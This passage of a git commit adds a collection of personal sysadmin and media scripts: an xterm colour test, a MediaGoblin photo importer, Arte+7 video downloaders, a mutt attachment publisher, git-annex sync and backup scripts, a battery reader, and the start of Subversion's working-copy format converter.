Public sharing

Meutel 2015-05-30 18:42:42 +02:00
commit a368f25d59
43 changed files with 5480 additions and 0 deletions

256colors2.pl Executable file
@@ -0,0 +1,63 @@
#!/usr/bin/perl
# Author: Todd Larason <jtl@molehill.org>
# $XFree86: xc/programs/xterm/vttests/256colors2.pl,v 1.2 2002/03/26 01:46:43 dickey Exp $
# use the resources for colors 0-15 - usually more-or-less a
# reproduction of the standard ANSI colors, but possibly more
# pleasing shades
# colors 16-231 are a 6x6x6 color cube
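# (index = 16 + 36*red + 6*green + blue, so e.g. red=5, green=0, blue=0
# maps to color 196)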
for ($red = 0; $red < 6; $red++) {
for ($green = 0; $green < 6; $green++) {
for ($blue = 0; $blue < 6; $blue++) {
printf("\x1b]4;%d;rgb:%2.2x/%2.2x/%2.2x\x1b\\",
16 + ($red * 36) + ($green * 6) + $blue,
($red ? ($red * 40 + 55) : 0),
($green ? ($green * 40 + 55) : 0),
($blue ? ($blue * 40 + 55) : 0));
}
}
}
# colors 232-255 are a grayscale ramp, intentionally leaving out
# black and white
for ($gray = 0; $gray < 24; $gray++) {
$level = ($gray * 10) + 8;
printf("\x1b]4;%d;rgb:%2.2x/%2.2x/%2.2x\x1b\\",
232 + $gray, $level, $level, $level);
}
# display the colors
# first the system ones:
print "System colors:\n";
for ($color = 0; $color < 8; $color++) {
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m\n";
for ($color = 8; $color < 16; $color++) {
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m\n\n";
# now the color cube
print "Color cube, 6x6x6:\n";
for ($green = 0; $green < 6; $green++) {
for ($red = 0; $red < 6; $red++) {
for ($blue = 0; $blue < 6; $blue++) {
$color = 16 + ($red * 36) + ($green * 6) + $blue;
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m ";
}
print "\n";
}
# now the grayscale ramp
print "Grayscale ramp:\n";
for ($color = 232; $color < 256; $color++) {
print "\x1b[48;5;${color}m ";
}
print "\x1b[0m\n";

add_mg.sh Executable file
@@ -0,0 +1,41 @@
#!/bin/sh
MG_ROOT="/usr/local/www/photos.meutel.net/mediagoblin"
ALBUMS_ROOT="/home/mediagoblin/albums"
MG_USER=meutel
add_all()
{
echo "=== TAGS $2 $3 ==="
ADD_PATH=$1
echo "== path: $ADD_PATH"
# group the -iname tests so that -type f applies to all of them
FILES=$(find "$ADD_PATH" -maxdepth 1 -type f \( -iname "*.png" -o -iname "*.mp4" -o -iname "*.jpg" \))
for file in $FILES
do
echo "Ajout: $file"
TITLE=$(basename $file)
$MG_ROOT/bin/gmg addmedia $MG_USER "$file" --title "$TITLE" --tags "$2,$3"
done
}
ifs=$IFS
IFS='\
'
ALBUMS=$(ls $ALBUMS_ROOT)
echo "albums: $ALBUMS"
for album in $ALBUMS
do
ALBUM_NAME=$(basename $album)
TAGALBUM=$(echo $ALBUM_NAME | sed 's/ /_/g')
echo "Album: $ALBUM_NAME"
ALBUM_PATH="${ALBUMS_ROOT}/$ALBUM_NAME"
for subalbum in $(find $ALBUM_PATH -type d)
do
echo "Sous-album: $subalbum"
SUBALBUM_NAME=$(basename $subalbum)
TAGSUBALBUM=$(echo $SUBALBUM_NAME | sed 's/ /_/g')
add_all "$subalbum" "$TAGALBUM" "$TAGSUBALBUM"
done
done
IFS=$ifs

addlabel.sh Executable file
@@ -0,0 +1,8 @@
#!/bin/sh
FORMAIL=/usr/local/bin/formail
if [ -n "$1" ]; then
grep -v "X-Label:.*$1" | $FORMAIL -fA "X-Label: $1"
else
exit 1
fi
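# Illustrative use from a procmail recipe (assumes this script is on PATH):
#   :0 fw
#   | addlabel.sh mylabel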

arte7-dl.sh Executable file
@@ -0,0 +1,246 @@
#!/bin/bash
# arte7-dl.sh - Download Arte+7 videos
# Version: 0.3.2
# Creation date: Sun, 26 Apr 2009 00:27:18 +0200
# Last update: Sun, 22 Nov 2009 21:35:34 +0100
# Author: CSM 'illovae' Seldon <druuna@dud-t.org>
# Copyleft 2009
# Helpers/Debuggers/Contributors:
# This script is a fork of an original idea by beubeud : Arte+7 Recorder
# http://codingteam.net/project/arte7recorder
# FREE ADVERTISE: http://u-classroom.net FTW!!
# arte7-dl.sh --help for help
# Dependencies: bash, mimms, wget, coreutils (echo, awk, grep, etc.)
# arte7-dl.sh is distributed under a dual Beer-Ware/WTFPLv2 license
# THE BEER-WARE LICENSE:
# As long as you retain this notice you can do whatever you want with this
# stuff. If we meet some day, and you think this stuff is worth it, you can
# buy me a beer in return.
# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
# Version 2, December 2004
# Everyone is permitted to copy and distribute verbatim or modified
# copies of this license document, and changing it is allowed as long
# as the name is changed.
# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
# TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
# 0. You just DO WHAT THE FUCK YOU WANT TO.
# NOTE for the video quality --
# With Arte7 you can download Medium Quality or High Quality videos.
# For the moment, this script has no option to let you choose which video
# quality you want. The video quality is defined in this script in the $VQ
# variable below and defaults to Medium Quality (MQ). Feel free to
# edit this variable at your convenience.
# BUG with mimms 3.2 --
# The original mimms 3.2, which can be downloaded from the project website
# http://savannah.nongnu.org/projects/mimms/, has a known bug: you cannot
# use the filename you want while downloading the stream. This is a feature
# used by this script, so we invite you to use another mimms version, or a
# patched one. For example, in Debian mimms has been patched to
# mimms 3.2.1 by the Debian developers, and it works properly.
# AND NOW WE CAN BEGIN!
# Variables
# Name by which this script was invoked.
PROGNAME=$(basename $0)
VERSION="0.3.2"
# Video Quality
VQ=MQ # HQ == High Quality ; MQ = Medium Quality
# Other variables
USAGE="Usage: $PROGNAME {option}
NB: The [VALUES] are required.
Options are:
-h, --help You're looking at it
-l, --list List all available shows
-i, --infos [VIDEO_ID] Get information about a show using VIDEO_ID
-d, --download [VIDEO_ID] Download a file using VIDEO_ID
-v, --version Version and license
"
CASE=help
# To prevent hairy quoting and escaping later.
bq='`'
eq="'"
# The functions
# We want to get the list of available shows
function getlist
{
XMLLINK="http://plus7.arte.tv$(wget -q -O - http://plus7.arte.tv/ | \
grep xmlURL | awk -F'"' '{print $4}')"
wget -q -O - $XMLLINK | grep -F "<index>
<bigTitle>
<startDate>
<offlineDate>
<targetURL>" | sed -e 's/<index>/-- VIDEO #/g' \
-e 's/<bigTitle>/Title: /g' \
-e 's/<startDate>/Since: /g' \
-e 's/<offlineDate>/To: /g' \
-e 's/<targetURL>/Video ID: /g' \
-e 's/http[^>]*,CmC=//g' \
-e 's/,schedu[^>]*html/\n/g' | \
sed -e 's/^\s*//' | sed 's/<[^>]*>//g'
}
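# For reference, the feed entries rewritten by the sed pipeline above look
# roughly like this (illustrative values, not a captured feed):
#   <index>12</index>
#   <bigTitle>Some show</bigTitle>
#   <startDate>2009-11-22T20:40:00</startDate>
#   <offlineDate>2009-11-29T20:40:00</offlineDate>
#   <targetURL>http://plus7.arte.tv/fr/videos,CmC=2935068,scheduled.html</targetURL>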
# We want information about a show
function getinfos
{
# We get the stuff
XMLLINK="http://plus7.arte.tv$(wget -q -O - http://plus7.arte.tv/ | \
grep xmlURL | awk -F'"' '{print $4}')"
GETXML=$(wget -q -O - "$XMLLINK" | grep -B 6 "$VIDEO_ID")
VIDEOURL=$(echo "$GETXML" | grep "<targetURL>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g")
if [ ! -z "$VIDEOURL" ]; then
# We want the name and date of the video and the HTML content
VIDEOTITLE=$(echo "$GETXML" | grep "<bigTitle>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g")
VIDEODATE=$(echo "$GETXML" | grep "<startDate>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g" | cut -d"T" -f1)
VIDEOHTML=$(wget -q -O - "$VIDEOURL")
# First we get the information
HEADLINE=$(echo "$VIDEOHTML" | grep -A 2 '<p class="headline">' | \
sed 's/<[^>]*>//g' | sed -e 's/^\s*//')
SYNOPSIS=$(echo "$VIDEOHTML" | grep -A 2 '<p class="text">' | \
sed 's/<[^>]*>//g' | sed -e 's/^\s*//')
INFOS=$(echo "$VIDEOHTML" | grep -A 2 '<p class="info">' | \
sed 's/<[^>]*>//g' | sed -e 's/^\s*//' | \
sed 's/(//' | sed 's/)/./')
# And finally we can display them
echo -e "Informations for "$bq$VIDEOTITLE$eq" ("$VIDEODATE"):\n"
echo -e "Headline --"$HEADLINE"\n"
echo -e "Synopsis --"$SYNOPSIS"\n"
echo -e "Others --"$INFOS
else
echo "$PROGNAME: there's no show whith the ID $bq$VIDEO_ID$eq"
echo "$PROGNAME: please check the show list to get a right ID"
echo "$PROGNAME: if your're sure of your ID, then this script might be deprecated"
echo "$PROGNAME: or the site may be broken..."
exit 1
fi
}
# Finally we want to download the wmv file
function getfile
{
# We get the stuff + we define CONV for proper file renaming
XMLLINK="http://plus7.arte.tv$(wget -q -O - http://plus7.arte.tv/ | \
grep xmlURL | awk -F'"' '{print $4}')"
GETXML=$(wget -q -O - "$XMLLINK" | grep -B 6 "$VIDEO_ID")
CONV="y/abcdefghijklmnopqrstuvwxyzéèêçàù/ABCDEFGHIJKLMNOPQRSTUVWXYZEEECAU/"
if [ ! -z "$GETXML" ]; then
# We want the name and date of the video ; putting them together
VIDEOTITLE=$(echo "$GETXML" | grep "<bigTitle>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g" | sed -e $CONV | \
tr "[:blank:]" "_")
VIDEODATE=$(echo "$GETXML" | grep "<startDate>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g" | cut -d"T" -f1)
FILERENAME=$VIDEOTITLE"_"$VIDEODATE
# Now we want the mms link and the original filename
VIDEOURL=$(echo "$GETXML" | grep "<targetURL>" | sed -e "s/^\s*//" | \
sed "s/<[^>]*>//g")
VIDEOLINK=$(wget -q -O - "$VIDEOURL" | grep wmv | grep $VQ | cut -d"\"" -f4)
FILEORINAME=$(echo "$VIDEOLINK" | cut -d"/" -f8 | cut -d"." -f1)
MMSLINK=$(wget -q -O - "$VIDEOLINK" | grep mms | cut -d"\"" -f2)
# All stuff ok, we can proceed
mimms -r $MMSLINK $FILERENAME"_"$FILEORINAME".wmv"
else
echo "$PROGNAME: there's no show whith the ID $bq$VIDEO_ID$eq"
echo "$PROGNAME: please check the show list to get a right ID"
echo "$PROGNAME: if your're sure of your ID, then this script might be deprecated"
echo "$PROGNAME: or the site may be broken..."
exit 1
fi
}
# OK here we go now!
# Parse command line arguments.
while test $# != 0; do
case "$1" in
-h|--help)
CASE=help
shift
;;
-l|--list)
CASE=list
shift
;;
-i|--infos)
CASE=infos
shift
;;
-d|--download)
CASE=download
shift
;;
-v|--version)
echo "$PROGNAME ($VERSION) distributed under Dual Beer-Ware/WTFPLv2"
exit 0
;;
-- ) # Stop option processing
shift
break
;;
-? | --* )
case "$1" in
--*=* ) arg=`echo "$1" | sed -e 's/=.*//'` ;;
*) arg="$1" ;;
esac
exec 1>&2
echo "$PROGNAME: unknown or ambiguous option $bq$arg$eq"
echo "$PROGNAME: Use $bq--help$eq for a list of options."
exit 1
;;
*)
break
;;
esac
done
# for every case, do something!
case "$CASE" in
help)
echo "$USAGE" 1>&2
exit 0
;;
list)
getlist
;;
infos)
VIDEO_ID=$1
getinfos
;;
download)
VIDEO_ID=$1
getfile
;;
esac
exit 0

arte7dump Executable file
@@ -0,0 +1,54 @@
#!/bin/bash
#
# Arte+7 video downloader (french HD version)
# Author: Gerome Fournier
# Version: 0.3
# Date: 2013-09-15
# http://foutaise.org/code/
usage()
{
local progname=${0##*/}
cat <<EOF
Dump the French HD version of an arte+7 video
Usage:
$progname <arte+7 url>
Example:
$progname "http://www.arte.tv/guide/fr/047158-000/evasion-fiscale?autoplay=1" > evasion-fiscale.flv
EOF
}
if [ "$1" == "-h" ]; then
usage
exit 0
fi
if [ "$#" -ne 1 ]; then
echo "Wrong number of arguments" >&2
exit 1
fi
# walk through several URLs to find the stream
link1=$(curl -s "$1" \
| grep ALL.json \
| head -n1 \
| sed -e 's/^.*arte_vp_url="//' -e 's/".*$//')
if [ -n "$link1" ]; then
json_hd_french=$(curl -s "$link1" \
| tr '{' '\n' \
| grep '"quality":"HD - 720p".*"versionCode":"\(VF\|VF-STF\|VOF-STF\)"' \
| tr ',' '\n')
streamer=$(grep '^"streamer"' <<< "$json_hd_french" | cut -d: -f2- | tr -d '"')
url=$(grep '^"url"' <<< "$json_hd_french" | cut -d: -f2- | tr -d '"')
if [ "${streamer:0:7}" == "rtmp://" ]; then
rtmpdump -r "$streamer" -y "mp4:$url"
exit 0
fi
fi
echo "Unable to find source stream" >&2
exit 1

attachement-http.sh Executable file
@@ -0,0 +1,76 @@
#!/bin/sh
#
# Copyright (c) 2010 Mary Gardiner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
## INFO
# This is a very simple script designed to be used when using the email client
# mutt remotely. It copies attachments to a web accessible folder and tells you
# where to view them.
#
# More details are available at http://puzzling.org/logs/thoughts/2010/May/6/mutt-attachments
# if you want to override OUTPUTDIR and VIEWINGDIR edit them here or create a
# ~/.copy-to-dir file that looks like:
# OUTPUTDIR=someotherdir
# VIEWINGDIR=someother URI
# You can also optionally specify a location to rsync attachments to,
# RSYNCOUTPUTDIR=host:dir
# You'll probably want a passphraseless key for this and NO DELETION of rsynced
# attachments will take place.
### Extension
# use short generated file name
OUTPUTDIR=$HOME/public_html/attachments
VIEWINGDIR=https://ssl.meutel.net/~meutel/attachments
CONFIGFILE=$HOME/.copy-to-dir
if [ -e "$CONFIGFILE" ]
then
. "$CONFIGFILE"
fi
if [ -n "$1" ]
then
if [ -n "$RSYNCOUTPUTDIR" ]
then
SHORTNAME=`basename "$1"`
echo "Uploading attachment $SHORTNAME for viewing"
rsync --chmod=ugo+r --progress -ptve "ssh -C" "$1" "$RSYNCOUTPUTDIR"
echo
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME"
elif [ ! -d "$OUTPUTDIR" ]
then
echo "ERROR: '$OUTPUTDIR' doesn't exist, or is not a directory"
else
SHORTNAME=`md5sum "$1" | cut -c -4`
MIME_TYPE=`file -Lb --mime-type "$1"`
# use the extension matching the MIME type
FILE_EXT=$(grep "$MIME_TYPE" /etc/mime.types | awk '{ print $2 }')
DELETE="$OUTPUTDIR/$SHORTNAME.$FILE_EXT"
cp "$1" "$DELETE"
# add the MIME type to the extended attributes
attr -s Content-Type -V "$MIME_TYPE" "$DELETE" > /dev/null
chmod 644 "$DELETE"
echo "View attachment $SHORTNAME at $VIEWINGDIR/$SHORTNAME.$FILE_EXT"
fi
fi

auto_sync.sh Executable file
@@ -0,0 +1,106 @@
#!/usr/bin/env bash
die()
{
echo "$*" >&2
exit 1
}
git_rdiff()
{
git fetch -q
GITREMOTEDIFF=$( git diff --name-status remotes/origin/master )
if [ -n "$GITREMOTEDIFF" ];then
echo "$( pwd ) not synchronised with remote" 1>&2
echo "$GITREMOTEDIFF" 1>&2
fi
}
git_st()
{
GITSTATUS=$( git status --porcelain )
if [ -n "$GITSTATUS" ]; then
echo "Untracked files in $( pwd )" 1>&2
echo "$GITSTATUS" 1>&2
fi
}
annex_copy() {
# copy auto from/to every remote
for remote in $(git remote)
do
git ls-remote $remote > /dev/null 2>&1 && git-annex get --auto --fast --quiet --from $remote
git ls-remote $remote > /dev/null 2>&1 && git-annex copy --auto --fast --quiet --to $remote
done
}
annex_control() {
UNUSED=$( git-annex unused --fast | grep -v checking | grep -v 'fast mode enabled' )
if [ -n "$UNUSED" ]; then
echo "Unused data in $( pwd )" 1>&2
echo "++$UNUSED++" 1>&2
fi
# list the files that do not have enough copies
git-annex fsck --fast > /dev/null
}
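# Example ~/.sync.cfg accepted by the parser below (hypothetical paths):
#   [/home/user/annex]
#   # lines starting with '#' are comments
#   annex.sync
#   annex.copy
#   [/home/user/work]
#   git.pull
#   git.push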
CONF=${1:-$HOME/.sync.cfg}
# echo Configuration: $CONF
[ -r $CONF ] || die "Missing configuration: $CONF"
ORIG_DIR=$PWD
#echo "ORIG_DIR $ORIG_DIR"
PIDFILE=${CONF}.pid
#echo "PIDFILE: $PIDFILE"
[ -f $PIDFILE ] && die "Pidfile exists: $PIDFILE"
touch $PIDFILE
declare -a LINE
exec < $CONF
dir_ok=1
while read -a LINE; do
# echo "${LINE[@]}"
if [[ "${LINE[@]}" =~ ^\[.*\]$ ]]; then
dir_head=${LINE[@]}
# bash > 4.2 dir=${dir_head:1: -1}
dir=${dir_head:1:${#dir_head}-2}
# echo "DIR $dir"
cd $ORIG_DIR
cd $dir
dir_ok=$?
pwd
elif [[ "${LINE[@]}" =~ ^# ]]; then
:
# echo COMMENT
elif [ $dir_ok -eq 0 ]; then
action="${LINE[0]}"
action_args="${LINE[@]:1}"
#echo ACTION $action
#echo ARGS $action_args
case "$action" in
annex.watch )
git-annex watch --quiet ;;
annex.sync )
git-annex sync --fast --quiet 2> /dev/null ;;
annex.copy)
annex_copy ;;
annex.to )
git-annex copy --auto --fast --quiet --to $action_args ;;
annex.from )
git-annex copy --auto --fast --quiet --from $action_args ;;
annex.control )
annex_control ;;
git.pull )
git pull -q ;;
git.diff )
git_rdiff ;;
git.status )
git_st ;;
git.push )
git commit -a --allow-empty-message -m "" && git push --porcelain ;;
esac
fi
done
cd $ORIG_DIR
#echo "PIDFILE: $PIDFILE"
rm -f $PIDFILE
[ -f $PIDFILE ] && die "Pidfile still exists $PIDFILE"

backup_obelix.sh Normal file
@@ -0,0 +1,45 @@
#!/bin/bash
# TODO
# home (excluding distributed data)
# git repos
# encrypt the sensitive data
# copy to FTP
# directory holding the backups
BACKUP_DIR=/home/backup
BACKUP_CUR=$BACKUP_DIR/current
mkdir -p $BACKUP_CUR
function do_backup {
BACKUP_PATH=$1
BACKUP_NAME=$2
BACKUP_FILE=$BACKUP_DIR/$BACKUP_NAME.$(date +%Y%m%d).tar.gz
BACKUP_LST=$BACKUP_DIR/$BACKUP_NAME.lst
ARCHIVE_DIR=$BACKUP_DIR/$(date +%Y%m%d)
# if the .lst file exists, this is an incremental backup
test -f $BACKUP_LST
INCR_BACKUP=$?
tar cpzf $BACKUP_FILE -C / --listed-incremental=$BACKUP_LST $BACKUP_PATH
# TODO crypt
# if not incremental (i.e. full), copy to the archive directory
if [ $INCR_BACKUP -ne 0 ]
then
mkdir -p $ARCHIVE_DIR
mv $BACKUP_FILE $ARCHIVE_DIR
# delete the previous incremental backups
rm -rf $BACKUP_CUR
else
mv $BACKUP_FILE $BACKUP_CUR
fi
}
# /etc
do_backup "/etc/" "$(hostname).etc"
# webapps
# TODO does not need to run as root
do_backup "/home/www" "$(hostname).www"

batt_status.pl Executable file
@@ -0,0 +1,106 @@
#!/usr/bin/perl
##############################
# Compute the battery state
##############################
use strict;
use vars qw(@Batt_Data %Useful);
# returns a list of hashes of the values read (one element per battery)
sub read_proc {
my @batts = find_batts();
my @Batt_Data;
for (@batts) {
my $batt_dir = $_;
my %h1 = read_Batt_Data($batt_dir.'state');
my %h2 = read_Batt_Data($batt_dir.'info');
# TODO better way?
my %h = %h1;
for my $key ( keys %h2 ) {
$h{$key} = $h2{$key};
}
# the array holds a reference to the hash
push @Batt_Data, {%h};
}
return @Batt_Data;
}
# read a battery data file from /proc
sub read_Batt_Data {
my ($file) = @_;
my %data;
#print '>>',$file,"\n";
open(DATA, "< $file") or return; # skip unreadable files ('next' would exit the sub)
while (<DATA>) {
if (/^([^:]+):\s+(.+)/){
#print "$1 -> $2\n";
$data{$1} = $2;
}
}
return %data;
}
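# A state file parsed above typically looks like this (illustrative values):
#   present:                 yes
#   charging state:          discharging
#   present rate:            1131 mA
#   remaining capacity:      3854 mAh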
# find the battery state directories
sub find_batts {
my @batts;
my $proc_path = '/proc/acpi/battery/';
# TODO check this is a directory
opendir(BATTS, $proc_path) or die "can't open $proc_path: $!";
while (defined(my $bat_dir = readdir(BATTS))) {
# TODO check this is a directory
if ($bat_dir =~ /BAT([0-9])/) {
#print $1,$bat_dir,"\n";
$batts[$1] = $proc_path.$bat_dir.'/';
}
}
return @batts;
}
# summarize the useful data
sub summarize {
# total capacity of the batteries
#print $Batt_Data[0]{'present'},"\n";
my $total_full_cap = 0;
my $total_rem = 0;
my $total_rate = 0;
for my $href ( @Batt_Data ) {
my $cap = $href->{'last full capacity'} || 0;
# always in mAh?
$total_full_cap += $_ for ( $cap =~ /(\d+) mAh/ );
#for ( keys %$href ) {
#print $_,"\n";
#}
my $remaining = $href->{'remaining capacity'} || 0;
#print $remaining,"\n";
$total_rem += $_ for ( $remaining =~ /(\d+) mAh/ );
my $rate = $href->{'present rate'} || 0;
$total_rate += $_ for ( $rate =~ /(\d+) mA/ );
}
$Useful{'capacity'} = $total_full_cap;
$Useful{'remaining'} = $total_rem;
$Useful{'rate'} = $total_rate;
# remaining time in hours (end of operation)
$Useful{'eooTime'} = $total_rate ? $total_rem / $total_rate : 0; # avoid dividing by zero on AC power
$Useful{'remainingPerc'} = 100*$total_rem/$total_full_cap;
return %Useful;
}
# TODO adapt to the OS
@Batt_Data = read_proc();
summarize();
print <<EOL;
total full cap $Useful{'capacity'}
total remaining cap $Useful{'remaining'}
total rate $Useful{'rate'}
EOL
printf("remaining: %.3f%%\n", $Useful{'remainingPerc'});
# TODO format the delay
printf("remaining time: %d min\n", 60 * $Useful{'eooTime'});
# TODO end-of-operation time
# TODO current operation (charging, discharging)

change-svn-wc-format.py Executable file
@@ -0,0 +1,419 @@
#!/usr/bin/env python
#
# change-svn-wc-format.py: Change the format of a Subversion working copy.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# ====================================================================
import sys
import os
import getopt
try:
my_getopt = getopt.gnu_getopt
except AttributeError:
my_getopt = getopt.getopt
### The entries file parser in subversion/tests/cmdline/svntest/entry.py
### handles the XML-based WC entries file format used by Subversion
### 1.3 and lower. It could be rolled into this script.
LATEST_FORMATS = { "1.4" : 8,
"1.5" : 9,
"1.6" : 10,
# Do NOT add format 11 here. See comment in must_retain_fields
# for why.
}
def usage_and_exit(error_msg=None):
"""Write usage information and exit. If ERROR_MSG is provide, that
error message is printed first (to stderr), the usage info goes to
stderr, and the script exits with a non-zero status. Otherwise,
usage info goes to stdout and the script exits with a zero status."""
progname = os.path.basename(sys.argv[0])
stream = error_msg and sys.stderr or sys.stdout
if error_msg:
stream.write("ERROR: %s\n\n" % error_msg)
stream.write("""\
usage: %s WC_PATH SVN_VERSION [--verbose] [--force] [--skip-unknown-format]
%s --help
Change the format of a Subversion working copy to that of SVN_VERSION.
--skip-unknown-format : skip directories with unknown working copy
format and continue the update
""" % (progname, progname))
stream.flush()
sys.exit(error_msg and 1 or 0)
def get_adm_dir():
"""Return the name of Subversion's administrative directory,
adjusted for the SVN_ASP_DOT_NET_HACK environment variable. See
<http://svn.apache.org/repos/asf/subversion/trunk/notes/asp-dot-net-hack.txt>
for details."""
return "SVN_ASP_DOT_NET_HACK" in os.environ and "_svn" or ".svn"
class WCFormatConverter:
"Performs WC format conversions."
root_path = None
error_on_unrecognized = True
force = False
verbosity = 0
def write_dir_format(self, format_nbr, dirname, paths):
"""Attempt to write the WC format FORMAT_NBR to the entries file
for DIRNAME. Throws LossyConversionException when not in --force
mode and unconvertible WC data is encountered."""
# Avoid iterating in unversioned directories.
if not (get_adm_dir() in paths):
del paths[:]
return
# Process the entries file for this versioned directory.
if self.verbosity:
print("Processing directory '%s'" % dirname)
entries = Entries(os.path.join(dirname, get_adm_dir(), "entries"))
entries_parsed = True
if self.verbosity:
print("Parsing file '%s'" % entries.path)
try:
entries.parse(self.verbosity)
except UnrecognizedWCFormatException, e:
if self.error_on_unrecognized:
raise
sys.stderr.write("%s, skipping\n" % e)
sys.stderr.flush()
entries_parsed = False
if entries_parsed:
format = Format(os.path.join(dirname, get_adm_dir(), "format"))
if self.verbosity:
print("Updating file '%s'" % format.path)
format.write_format(format_nbr, self.verbosity)
else:
if self.verbosity:
print("Skipping file '%s'" % format.path)
if self.verbosity:
print("Checking whether WC format can be converted")
try:
entries.assert_valid_format(format_nbr, self.verbosity)
except LossyConversionException, e:
# In --force mode, ignore complaints about lossy conversion.
if self.force:
print("WARNING: WC format conversion will be lossy. Dropping "\
"field(s) %s " % ", ".join(e.lossy_fields))
else:
raise
if self.verbosity:
print("Writing WC format")
entries.write_format(format_nbr)
def change_wc_format(self, format_nbr):
"""Walk all paths in a WC tree, and change their format to
FORMAT_NBR. Throw LossyConversionException or NotImplementedError
if the WC format should not be converted, or is unrecognized."""
for dirpath, dirs, files in os.walk(self.root_path):
self.write_dir_format(format_nbr, dirpath, dirs + files)
class Entries:
"""Represents a .svn/entries file.
'The entries file' section in subversion/libsvn_wc/README is a
useful reference."""
# The name and index of each field composing an entry's record.
entry_fields = (
"name",
"kind",
"revision",
"url",
"repos",
"schedule",
"text-time",
"checksum",
"committed-date",
"committed-rev",
"last-author",
"has-props",
"has-prop-mods",
"cachable-props",
"present-props",
"conflict-old",
"conflict-new",
"conflict-wrk",
"prop-reject-file",
"copied",
"copyfrom-url",
"copyfrom-rev",
"deleted",
"absent",
"incomplete",
"uuid",
"lock-token",
"lock-owner",
"lock-comment",
"lock-creation-date",
"changelist",
"keep-local",
"working-size",
"depth",
"tree-conflicts",
"file-external",
)
# The format number.
format_nbr = -1
# How many bytes the format number takes in the file. (The format number
# may have leading zeroes after using this script to convert format 10 to
# format 9 -- which would write the format number as '09'.)
format_nbr_bytes = -1
def __init__(self, path):
self.path = path
self.entries = []
def parse(self, verbosity=0):
"""Parse the entries file. Throw NotImplementedError if the WC
format is unrecognized."""
input = open(self.path, "r")
# Read WC format number from INPUT. Validate that it
# is a supported format for conversion.
format_line = input.readline()
try:
self.format_nbr = int(format_line)
self.format_nbr_bytes = len(format_line.rstrip()) # remove '\n'
except ValueError:
self.format_nbr = -1
self.format_nbr_bytes = -1
if not self.format_nbr in LATEST_FORMATS.values():
raise UnrecognizedWCFormatException(self.format_nbr, self.path)
# Parse file into individual entries, to later inspect for
# non-convertable data.
entry = None
while True:
entry = self.parse_entry(input, verbosity)
if entry is None:
break
self.entries.append(entry)
input.close()
def assert_valid_format(self, format_nbr, verbosity=0):
if verbosity >= 2:
print("Validating format for entries file '%s'" % self.path)
for entry in self.entries:
if verbosity >= 3:
print("Validating format for entry '%s'" % entry.get_name())
try:
entry.assert_valid_format(format_nbr)
except LossyConversionException:
if verbosity >= 3:
sys.stderr.write("Offending entry:\n%s\n" % entry)
sys.stderr.flush()
raise
def parse_entry(self, input, verbosity=0):
"Read an individual entry from INPUT stream."
entry = None
while True:
line = input.readline()
if line in ("", "\x0c\n"):
# EOF or end of entry terminator encountered.
break
if entry is None:
entry = Entry()
# Retain the field value, ditching its field terminator ("\x0a").
entry.fields.append(line[:-1])
if entry is not None and verbosity >= 3:
sys.stdout.write(str(entry))
print("-" * 76)
return entry
def write_format(self, format_nbr):
# Overwrite all bytes of the format number (which are the first bytes in
# the file). Overwrite format '10' by format '09', which will be converted
# to '9' by Subversion when it rewrites the file. (Subversion 1.4 and later
# ignore leading zeroes in the format number.)
assert len(str(format_nbr)) <= self.format_nbr_bytes
format_string = '%0' + str(self.format_nbr_bytes) + 'd'
os.chmod(self.path, 0600)
output = open(self.path, "r+", 0)
output.write(format_string % format_nbr)
output.close()
os.chmod(self.path, 0400)
class Entry:
"Describes an entry in a WC."
# Maps format numbers to indices of fields within an entry's record that must
# be retained when downgrading to that format.
must_retain_fields = {
# Not in 1.4: changelist, keep-local, depth, tree-conflicts, file-externals
8 : (30, 31, 33, 34, 35),
# Not in 1.5: tree-conflicts, file-externals
9 : (34, 35),
10 : (),
# Downgrading from format 11 (1.7-dev) to format 10 is not possible,
# because 11 does not use has-props and cachable-props (but 10 does).
# Naively downgrading in that situation causes properties to disappear
# from the wc.
#
# Downgrading from the 1.7 SQLite-based format to format 10 is not
# implemented.
}
def __init__(self):
self.fields = []
def assert_valid_format(self, format_nbr):
"Assure that conversion will be non-lossy by examining fields."
# Check whether lossy conversion is being attempted.
lossy_fields = []
for field_index in self.must_retain_fields[format_nbr]:
if len(self.fields) - 1 >= field_index and self.fields[field_index]:
lossy_fields.append(Entries.entry_fields[field_index])
if lossy_fields:
raise LossyConversionException(lossy_fields,
"Lossy WC format conversion requested for entry '%s'\n"
"Data for the following field(s) is unsupported by older versions "
